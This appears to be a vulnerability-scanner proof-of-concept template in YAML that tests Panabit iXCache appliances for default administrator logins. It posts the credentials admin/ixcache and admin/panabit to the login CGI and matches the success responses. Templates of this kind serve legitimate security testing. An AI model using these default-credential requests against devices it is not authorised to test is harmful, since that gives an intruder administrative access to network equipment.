name: yaml-poc-panabit-ixcache-unsafe_config-CT-159101
binding: a62dcfbd-7a0c-4069-910a-8d3f8320c208
detail:
    author: system_user
    vulnerability:
        id: 1d075f15-da3f-4e6b-9bad-1353e5fc101f
        level: high
transport: http
rules:
    r0:
        request:
            cache: true
            method: POST
            path: /login/userverify.cgi
            headers:
                Content-Type: application/x-www-form-urlencoded
            body: username=admin&password=ixcache
        expression: response.status == 200 && response.body.bcontains(b"URL=/cgi-bin/monitor.cgi")
    r1:
        request:
            cache: true
            method: POST
            path: /login/userverify.cgi
            headers:
                Content-Type: application/x-www-form-urlencoded
            body: username=admin&password=panabit
        expression: response.status == 200 && response.headers["Set-Cookie"].contains("paonline_admin") && response.body.bcontains(b"URL=/index.htm")
expression: r0() || r1()
